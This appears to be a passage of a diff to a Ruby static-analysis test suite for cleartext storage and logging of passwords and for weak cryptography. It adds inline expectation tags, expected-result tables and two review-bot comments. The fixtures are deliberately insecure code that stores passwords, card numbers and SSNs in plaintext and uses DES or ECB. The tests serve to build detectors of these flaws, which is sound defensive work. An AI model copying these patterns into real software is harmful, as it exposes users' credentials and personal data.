app/controllers/users_controller.rb:13:42:13:53 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:13:42:13:53 | new_password | This stores sensitive data returned by $@ as clear text. 
| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | -| app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:15:49:15:60 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | -| app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:15:49:15:60 | new_password | a write to password | -| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | -| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:15:49:15:60 | new_password | a write to password | -| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. 
| app/controllers/users_controller.rb:15:87:15:98 | new_password | a write to password | -| app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" : String | app/controllers/users_controller.rb:21:45:21:56 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | an assignment to new_password | -| app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:21:45:21:56 | new_password | a write to password | -| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" : String | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | an assignment to new_password | -| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:21:45:21:56 | new_password | a write to password | -| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. 
| app/controllers/users_controller.rb:21:83:21:94 | new_password | a write to password | -| app/controllers/users_controller.rb:28:27:28:38 | new_password | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" : String | app/controllers/users_controller.rb:28:27:28:38 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | an assignment to new_password | -| app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" : String | app/controllers/users_controller.rb:30:28:30:39 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | an assignment to new_password | -| app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:30:28:30:39 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:30:28:30:39 | new_password | a write to password | -| app/controllers/users_controller.rb:37:39:37:50 | new_password | app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" : String | app/controllers/users_controller.rb:37:39:37:50 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" | an assignment to new_password | -| app/controllers/users_controller.rb:44:21:44:32 | new_password | app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" : String | app/controllers/users_controller.rb:44:21:44:32 | new_password | This stores sensitive data returned by $@ as clear text. 
| app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" | an assignment to new_password | -| app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" : String | app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | an assignment to new_password | -| app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" : String | app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | an assignment to new_password | -| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:79:19:79:30 | "aaaaaaaaaa" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:79:19:79:30 | "aaaaaaaaaa" | a write to password | -| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:80:29:80:49 | "0000-0000-0000-0000" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:80:29:80:49 | "0000-0000-0000-0000" | a write to credit_card_number | -| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:81:14:81:27 | "000-00-00000" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. 
| app/controllers/users_controller.rb:81:14:81:27 | "000-00-00000" | a write to SSN | -| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:83:30:83:38 | "bbbbbbb" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:83:30:83:38 | "bbbbbbb" | a write to password | -| app/models/user.rb:5:27:5:38 | new_password | app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" : String | app/models/user.rb:5:27:5:38 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" | an assignment to new_password | -| app/models/user.rb:11:22:11:33 | new_password | app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" : String | app/models/user.rb:11:22:11:33 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" | an assignment to new_password | -| app/models/user.rb:17:21:17:32 | new_password | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" : String | app/models/user.rb:17:21:17:32 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" | an assignment to new_password | diff --git a/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.qlref b/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.qlref index 051d588b7010..903a20fe574c 100644 --- a/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.qlref +++ b/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.qlref @@ -1 +1,2 @@ -queries/security/cwe-312/CleartextStorage.ql \ No newline at end of file +query: queries/security/cwe-312/CleartextStorage.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/ruby/ql/test/query-tests/security/cwe-312/app/controllers/users_controller.rb b/ruby/ql/test/query-tests/security/cwe-312/app/controllers/users_controller.rb index 806b51096659..ae277596cfef 100644 --- a/ruby/ql/test/query-tests/security/cwe-312/app/controllers/users_controller.rb +++ b/ruby/ql/test/query-tests/security/cwe-312/app/controllers/users_controller.rb 
@@ -1,47 +1,47 @@ class UsersController < ApplicationController def createLikeCall - new_password = "043697b96909e03ca907599d6420555f" + new_password = "043697b96909e03ca907599d6420555f" # $ Source[rb/clear-text-storage-sensitive-data] # BAD: plaintext password stored to database - User.create(name: "U1", password: new_password) + User.create(name: "U1", password: new_password) # $ Alert[rb/clear-text-storage-sensitive-data] # BAD: plaintext password stored to database - User.create({ name: "U1", password: new_password }) + User.create({ name: "U1", password: new_password }) # $ Alert[rb/clear-text-storage-sensitive-data] end def updateLikeClassMethodCall - new_password = "083c9e1da4cc0c2f5480bb4dbe6ff141" + new_password = "083c9e1da4cc0c2f5480bb4dbe6ff141" # $ Source[rb/clear-text-storage-sensitive-data] # BAD: plaintext password stored to database - User.update(1, name: "U1", password: new_password) + User.update(1, name: "U1", password: new_password) # $ Alert[rb/clear-text-storage-sensitive-data] # BAD: plaintext password stored to database - User.update([1, 2], [{name: "U1", password: new_password}, {name: "U2", password: new_password}]) + User.update([1, 2], [{name: "U1", password: new_password}, {name: "U2", password: new_password}]) # $ Alert[rb/clear-text-storage-sensitive-data] end def insertAllLikeCall - new_password = "504d224a806cf8073cd14ef08242d422" + new_password = "504d224a806cf8073cd14ef08242d422" # $ Source[rb/clear-text-storage-sensitive-data] # BAD: plaintext password stored to database - User.insert_all([{name: "U1", password: new_password}, {name: "U2", password: new_password}]) + User.insert_all([{name: "U1", password: new_password}, {name: "U2", password: new_password}]) # $ Alert[rb/clear-text-storage-sensitive-data] end def updateLikeInstanceMethodCall user = User.find(1) - new_password = "7d6ae08394c3f284506dca70f05995f6" + new_password = "7d6ae08394c3f284506dca70f05995f6" # $ Source[rb/clear-text-storage-sensitive-data] # BAD: plaintext 
password stored to database - user.update(password: new_password) + user.update(password: new_password) # $ Alert[rb/clear-text-storage-sensitive-data] # BAD: plaintext password stored to database - user.update({password: new_password}) + user.update({password: new_password}) # $ Alert[rb/clear-text-storage-sensitive-data] end def updateAttributeCall user = User.find(1) - new_password = "ff295f8648a406c37fbe378377320e4c" + new_password = "ff295f8648a406c37fbe378377320e4c" # $ Source[rb/clear-text-storage-sensitive-data] # BAD: plaintext password stored to database - user.update_attribute("password", new_password) + user.update_attribute("password", new_password) # $ Alert[rb/clear-text-storage-sensitive-data] end def assignAttributeCall user = User.find(1) - new_password = "78ffbec583b546bd073efd898f833184" + new_password = "78ffbec583b546bd073efd898f833184" # $ Source[rb/clear-text-storage-sensitive-data] # BAD: plaintext password assigned to database field - user.password = new_password + user.password = new_password # $ Alert[rb/clear-text-storage-sensitive-data] user.save end @@ -55,13 +55,13 @@ def hashedPasswordAssign end def fileWrites - new_password = "0157af7c38cbdd24f1616de4e5321861" + new_password = "0157af7c38cbdd24f1616de4e5321861" # $ Source[rb/clear-text-storage-sensitive-data] # BAD: plaintext password stored to disk - IO.write("foo.txt", "password: #{new_password}\n") + IO.write("foo.txt", "password: #{new_password}\n") # $ Alert[rb/clear-text-storage-sensitive-data] # BAD: plaintext password stored to disk - File.new("bar.txt", "a").puts("password: #{new_password}") + File.new("bar.txt", "a").puts("password: #{new_password}") # $ Alert[rb/clear-text-storage-sensitive-data] end def randomPasswordAssign 
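Review bot: The one `# $ Alert[rb/clear-text-storage-sensitive-data]` tag on the `User.update([1, 2], [...])` and `User.insert_all([...])` lines hides that each line carries two results: the `.expected` rows for this file list sinks at 15:49 and 15:87, and at 21:45 and 21:83, one per `password: new_password` entry. As far as I can tell an inline tag is matched per line, so only the `#select` table pins that the second hash entry is still flagged. I would say so in the existing comment, e.g. `# BAD: plaintext password stored to database (both hash entries are reported)`. The same applies to `User.create!(inf)` in the `@@ -76,15 +76,15 @@` hunk, where one tag stands for the four sources on lines 79, 80, 81 and 83. The class body continues outside these hunks.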
@@ -76,15 +76,15 @@ def test info = [ { name: "U1", - password: "aaaaaaaaaa", - credit_card_number: "0000-0000-0000-0000", - SSN: "000-00-00000" + password: "aaaaaaaaaa", # $ Source[rb/clear-text-storage-sensitive-data] + credit_card_number: "0000-0000-0000-0000", # $ Source[rb/clear-text-storage-sensitive-data] + SSN: "000-00-00000" # $ Source[rb/clear-text-storage-sensitive-data] }, - {name: "U2", password: "bbbbbbb"} + {name: "U2", password: "bbbbbbb"} # $ Source[rb/clear-text-storage-sensitive-data] ] info.each do |inf| # BAD: Plaintext password, SSN, and CCN stored to database. - User.create!(inf) + User.create!(inf) # $ Alert[rb/clear-text-storage-sensitive-data] end end end diff --git a/ruby/ql/test/query-tests/security/cwe-312/app/models/user.rb b/ruby/ql/test/query-tests/security/cwe-312/app/models/user.rb index 09d1866424a3..7b5943e641c3 100644 --- a/ruby/ql/test/query-tests/security/cwe-312/app/models/user.rb +++ b/ruby/ql/test/query-tests/security/cwe-312/app/models/user.rb 
@@ -1,20 +1,20 @@ class User < ActiveRecord::Base def set_password_1 - new_password = "06c38c6a8a9c11a9d3b209a3193047b4" + new_password = "06c38c6a8a9c11a9d3b209a3193047b4" # $ Source[rb/clear-text-storage-sensitive-data] # BAD: directly storing a potential cleartext password to a field - self.update(password: new_password) + self.update(password: new_password) # $ Alert[rb/clear-text-storage-sensitive-data] end def set_password_2 - new_password = "52652fb5c709fb6b9b5a0194af7c6067" + new_password = "52652fb5c709fb6b9b5a0194af7c6067" # $ Source[rb/clear-text-storage-sensitive-data] # BAD: directly storing a potential cleartext password to a field - update(password: new_password) + update(password: new_password) # $ Alert[rb/clear-text-storage-sensitive-data] end def set_password_3 - new_password = "f982bf2531c149a8a1444a951b12e830" + new_password = "f982bf2531c149a8a1444a951b12e830" # $ Source[rb/clear-text-storage-sensitive-data] # BAD: directly assigning a potential cleartext password to a field - self.password = new_password + self.password = new_password # $ Alert[rb/clear-text-storage-sensitive-data] self.save end end diff --git a/ruby/ql/test/query-tests/security/cwe-312/logging.rb b/ruby/ql/test/query-tests/security/cwe-312/logging.rb index 26b148f33c26..03b21b3625c2 100644 --- a/ruby/ql/test/query-tests/security/cwe-312/logging.rb +++ b/ruby/ql/test/query-tests/security/cwe-312/logging.rb 
@@ -1,45 +1,45 @@ stdout_logger = Logger.new STDOUT -password = "043697b96909e03ca907599d6420555f" +password = "043697b96909e03ca907599d6420555f" # $ Source[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger.info password +stdout_logger.info password # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger.debug password +stdout_logger.debug password # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger.error password +stdout_logger.error password # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger.fatal password +stdout_logger.fatal password # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger.unknown password +stdout_logger.unknown password # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger.warn password +stdout_logger.warn password # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger.add Logger::WARN, password +stdout_logger.add Logger::WARN, password # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger.add Logger::WARN, "message", password +stdout_logger.add Logger::WARN, "message", password # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger.log Logger::WARN, password +stdout_logger.log Logger::WARN, password # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger << "pw: #{password}" +stdout_logger << "pw: #{password}" # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: sensitive data in the progname will taint subsequent logging calls -stdout_logger.progname = password +stdout_logger.progname = password # $ Alert[rb/clear-text-logging-sensitive-data] -hsh1 = { password: "aec5058e61f7f122998b1a30ee2c66b6" } +hsh1 = { 
password: "aec5058e61f7f122998b1a30ee2c66b6" } # $ Source[rb/clear-text-logging-sensitive-data] hsh2 = {} # GOOD: no backwards flow stdout_logger.info hsh2[:password] -hsh2[:password] = "beeda625d7306b45784d91ea0336e201" +hsh2[:password] = "beeda625d7306b45784d91ea0336e201" # $ Source[rb/clear-text-logging-sensitive-data] hsh3 = hsh2 # BAD: password logged as plaintext -stdout_logger.info hsh1[:password] +stdout_logger.info hsh1[:password] # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger.info hsh2[:password] +stdout_logger.info hsh2[:password] # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger.info hsh3[:password] +stdout_logger.info hsh3[:password] # $ Alert[rb/clear-text-logging-sensitive-data] # GOOD: not a password stdout_logger.info hsh1[:foo] 
@@ -61,30 +61,30 @@ # GOOD: password is effectively masked before logging stdout_logger.info password_masked_gsub_ex -password_masked_ineffective_sub = "ca497451f5e883662fb1a37bc9ec7838" -password_masked_ineffective_sub_ex = "ca497451f5e883662fb1a37bc9ec7838" -password_masked_ineffective_gsub = "a7e3747b19930d4f4b8181047194832f" -password_masked_ineffective_gsub_ex = "a7e3747b19930d4f4b8181047194832f" -password_masked_ineffective_sub = password_masked_ineffective_sub.sub(/./, "[password]") +password_masked_ineffective_sub = "ca497451f5e883662fb1a37bc9ec7838" # $ Source[rb/clear-text-logging-sensitive-data] +password_masked_ineffective_sub_ex = "ca497451f5e883662fb1a37bc9ec7838" # $ Source[rb/clear-text-logging-sensitive-data] +password_masked_ineffective_gsub = "a7e3747b19930d4f4b8181047194832f" # $ Source[rb/clear-text-logging-sensitive-data] +password_masked_ineffective_gsub_ex = "a7e3747b19930d4f4b8181047194832f" # $ Source[rb/clear-text-logging-sensitive-data] +password_masked_ineffective_sub = password_masked_ineffective_sub.sub(/./, "[password]") # $ Source[rb/clear-text-logging-sensitive-data] password_masked_ineffective_sub_ex.sub!(/./, "[password]") -password_masked_ineffective_gsub = password_masked_ineffective_gsub.gsub(/[A-Z]/, "*") +password_masked_ineffective_gsub = password_masked_ineffective_gsub.gsub(/[A-Z]/, "*") # $ Source[rb/clear-text-logging-sensitive-data] password_masked_ineffective_gsub_ex.gsub!(/[A-Z]/, "*") # BAD: password masked ineffectively -stdout_logger.info password_masked_ineffective_sub +stdout_logger.info password_masked_ineffective_sub # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password masked ineffectively -stdout_logger.info password_masked_ineffective_gsub +stdout_logger.info password_masked_ineffective_gsub # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password masked ineffectively -stdout_logger.info password_masked_ineffective_sub_ex +stdout_logger.info password_masked_ineffective_sub_ex # $ 
Alert[rb/clear-text-logging-sensitive-data] # BAD: password masked ineffectively -stdout_logger.info password_masked_ineffective_gsub_ex +stdout_logger.info password_masked_ineffective_gsub_ex # $ Alert[rb/clear-text-logging-sensitive-data] def foo(password, logger) # BAD: password logged as plaintext - logger.info password + logger.info password # $ Alert[rb/clear-text-logging-sensitive-data] end -password_arg = "65f2950df2f0e2c38d7ba2ccca767291" +password_arg = "65f2950df2f0e2c38d7ba2ccca767291" # $ Source[rb/clear-text-logging-sensitive-data] foo(password_arg, stdout_logger) foo("65f2950df2f0e2c38d7ba2ccca767292", stdout_logger) diff --git a/ruby/ql/test/query-tests/security/cwe-327/BrokenCryptoAlgorithm.qlref b/ruby/ql/test/query-tests/security/cwe-327/BrokenCryptoAlgorithm.qlref index e1c31fb2d584..92b721c8549e 100644 --- a/ruby/ql/test/query-tests/security/cwe-327/BrokenCryptoAlgorithm.qlref +++ b/ruby/ql/test/query-tests/security/cwe-327/BrokenCryptoAlgorithm.qlref @@ -1 +1,2 @@ -queries/security/cwe-327/BrokenCryptoAlgorithm.ql \ No newline at end of file +query: queries/security/cwe-327/BrokenCryptoAlgorithm.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.expected b/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.expected index 0ad72554019f..30e754c63d0d 100644 --- a/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.expected +++ b/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.expected 
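Review bot: The `# $ Source[rb/clear-text-logging-sensitive-data]` tags on the `.sub(/./, "[password]")` and `.gsub(/[A-Z]/, "*")` reassignment lines need a comment, because the in-place `sub!` and `gsub!` lines next to them carry no tag and nothing explains the difference. Presumably the query reports the write to a password-named variable as a source in its own right, so the ineffectively masked value is tracked as sensitive from that line on; that is the behaviour this test guards and it is worth stating. Something like `# the reassigned, still-unmasked value is itself a source` above each of the two lines would do, once the reason is confirmed against the `.expected` rows for logging.rb, which are outside this hunk.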
@@ -1,3 +1,11 @@ +#select +| weak_hashing.rb:10:23:10:30 | password | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:10:23:10:30 | password | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | +| weak_hashing.rb:11:32:11:39 | password | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:11:32:11:39 | password | $@ is used in a hashing algorithm (SHA1) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | +| weak_hashing.rb:12:23:12:30 | username | weak_hashing.rb:4:1:4:8 | username | weak_hashing.rb:12:23:12:30 | username | $@ is used in a hashing algorithm (MD5) that is insecure. | weak_hashing.rb:4:1:4:8 | username | Sensitive data (id) | +| weak_hashing.rb:13:23:13:23 | x | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:13:23:13:23 | x | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | +| weak_hashing.rb:24:23:24:36 | call to get_password | weak_hashing.rb:24:23:24:36 | call to get_password | weak_hashing.rb:24:23:24:36 | call to get_password | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:24:23:24:36 | call to get_password | Sensitive data (password) | +| weak_hashing.rb:28:23:28:42 | ...[...] | weak_hashing.rb:28:23:28:42 | ...[...] | weak_hashing.rb:28:23:28:42 | ...[...] | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:28:23:28:42 | ...[...] 
| Sensitive data (password) | +| weak_hashing.rb:32:25:32:38 | password_param | weak_hashing.rb:30:25:30:38 | password_param | weak_hashing.rb:32:25:32:38 | password_param | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:30:25:30:38 | password_param | Sensitive data (password) | edges | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:6:1:6:1 | x | provenance | | | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:10:23:10:30 | password | provenance | | 
@@ -18,11 +26,3 @@ nodes | weak_hashing.rb:30:25:30:38 | password_param | semmle.label | password_param | | weak_hashing.rb:32:25:32:38 | password_param | semmle.label | password_param | subpaths -#select -| weak_hashing.rb:10:23:10:30 | password | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:10:23:10:30 | password | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | -| weak_hashing.rb:11:32:11:39 | password | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:11:32:11:39 | password | $@ is used in a hashing algorithm (SHA1) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | -| weak_hashing.rb:12:23:12:30 | username | weak_hashing.rb:4:1:4:8 | username | weak_hashing.rb:12:23:12:30 | username | $@ is used in a hashing algorithm (MD5) that is insecure. | weak_hashing.rb:4:1:4:8 | username | Sensitive data (id) | -| weak_hashing.rb:13:23:13:23 | x | weak_hashing.rb:3:1:3:8 | password | weak_hashing.rb:13:23:13:23 | x | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:3:1:3:8 | password | Sensitive data (password) | -| weak_hashing.rb:24:23:24:36 | call to get_password | weak_hashing.rb:24:23:24:36 | call to get_password | weak_hashing.rb:24:23:24:36 | call to get_password | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:24:23:24:36 | call to get_password | Sensitive data (password) | -| weak_hashing.rb:28:23:28:42 | ...[...] | weak_hashing.rb:28:23:28:42 | ...[...] | weak_hashing.rb:28:23:28:42 | ...[...] 
| $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:28:23:28:42 | ...[...] | Sensitive data (password) | -| weak_hashing.rb:32:25:32:38 | password_param | weak_hashing.rb:30:25:30:38 | password_param | weak_hashing.rb:32:25:32:38 | password_param | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | weak_hashing.rb:30:25:30:38 | password_param | Sensitive data (password) | diff --git a/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.qlref b/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.qlref index dcb5a4e62a7e..b4891bf7bcab 100644 --- a/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.qlref +++ b/ruby/ql/test/query-tests/security/cwe-327/WeakSensitiveDataHashing.qlref @@ -1 +1,2 @@ -queries/security/cwe-327/WeakSensitiveDataHashing.ql \ No newline at end of file +query: queries/security/cwe-327/WeakSensitiveDataHashing.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-327/broken_crypto.rb b/ruby/ql/test/query-tests/security/cwe-327/broken_crypto.rb index 69dcd6b472bb..a9965a250f00 100644 --- a/ruby/ql/test/query-tests/security/cwe-327/broken_crypto.rb +++ b/ruby/ql/test/query-tests/security/cwe-327/broken_crypto.rb 
@@ -1,19 +1,19 @@ require 'openssl' # BAD: creating a cipher using a weak scheme -weak = OpenSSL::Cipher.new('des3') +weak = OpenSSL::Cipher.new('des3') # $ Alert[rb/weak-cryptographic-algorithm] weak.encrypt weak.random_key # BAD: encrypting data using a weak cipher -weak.update('foo') +weak.update('foo') # $ Alert[rb/weak-cryptographic-algorithm] weak.final # BAD: creating a cipher using a weak block mode -weak = OpenSSL::Cipher::AES.new(128, 'ecb') +weak = OpenSSL::Cipher::AES.new(128, 'ecb') # $ Alert[rb/weak-cryptographic-algorithm] weak.encrypt weak.random_key # BAD: encrypting data using a weak block mode -weak.update('foo') +weak.update('foo') # $ Alert[rb/weak-cryptographic-algorithm] weak.final # GOOD: creating a cipher using a strong scheme @@ -25,7 +25,7 @@ strong.final # BAD: weak block mode -OpenSSL::Cipher::AES.new(128, :ecb) +OpenSSL::Cipher::AES.new(128, :ecb) # $ Alert[rb/weak-cryptographic-algorithm] # GOOD: strong encryption algorithm OpenSSL::Cipher::AES.new(128, 'cbc') # GOOD: strong encryption algorithm 
@@ -34,49 +34,49 @@ # GOOD: strong encryption algorithm OpenSSL::Cipher::AES128.new # BAD: weak block mode -OpenSSL::Cipher::AES128.new 'ecb' +OpenSSL::Cipher::AES128.new 'ecb' # $ Alert[rb/weak-cryptographic-algorithm] # GOOD: strong encryption algorithm OpenSSL::Cipher::AES192.new # BAD: weak block mode -OpenSSL::Cipher::AES192.new 'ecb' +OpenSSL::Cipher::AES192.new 'ecb' # $ Alert[rb/weak-cryptographic-algorithm] # GOOD: strong encryption algorithm OpenSSL::Cipher::AES256.new # BAD: weak block mode -OpenSSL::Cipher::AES256.new 'ecb' +OpenSSL::Cipher::AES256.new 'ecb' # $ Alert[rb/weak-cryptographic-algorithm] # GOOD: strong encryption algorithm OpenSSL::Cipher::BF.new # BAD: weak block mode -OpenSSL::Cipher::BF.new 'ecb' +OpenSSL::Cipher::BF.new 'ecb' # $ Alert[rb/weak-cryptographic-algorithm] # GOOD: strong encryption algorithm OpenSSL::Cipher::CAST5.new # BAD: weak block mode -OpenSSL::Cipher::CAST5.new 'ecb' +OpenSSL::Cipher::CAST5.new 'ecb' # $ Alert[rb/weak-cryptographic-algorithm] # BAD: weak encryption algorithm -OpenSSL::Cipher::DES.new +OpenSSL::Cipher::DES.new # $ Alert[rb/weak-cryptographic-algorithm] # BAD: weak encryption algorithm -OpenSSL::Cipher::DES.new 'cbc' +OpenSSL::Cipher::DES.new 'cbc' # $ Alert[rb/weak-cryptographic-algorithm] # GOOD: strong encryption algorithm OpenSSL::Cipher::IDEA.new # BAD: weak block mode -OpenSSL::Cipher::IDEA.new 'ecb' +OpenSSL::Cipher::IDEA.new 'ecb' # $ Alert[rb/weak-cryptographic-algorithm] # BAD: weak encryption algorithm 